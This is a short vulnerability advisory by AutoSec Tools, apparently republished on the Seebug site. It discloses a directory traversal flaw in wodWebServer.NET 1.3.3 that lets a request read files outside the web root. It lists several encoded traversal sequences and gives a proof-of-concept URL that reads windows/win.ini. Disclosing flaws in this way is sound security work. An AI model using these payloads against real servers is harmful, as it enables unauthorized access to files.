------------------------------------------------------------------------ Software................wodWebServer.NET 1.3.3 Vulnerability...........Directory Traversal Threat Level............Serious (3/5) Download................http://www.weonlydo.com/WebServer.NET/web-http-net-server.asp Vendor Contact Date.....3/13/2011 Disclosure Date.........3/27/2011 Tested On...............Windows Vista ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch <john@autosectools.com> ------------------------------------------------------------------------ --Description-- A directory traversal vulnerability in wodWebServer.NET 1.3.3 can be exploited to read files outside of the web root. --Exploit-- ..%5C/ ..%2F/ ..%2E/ ..\/ ..// .../ ..\ ../ --PoC-- http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows%5C/win.ini
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论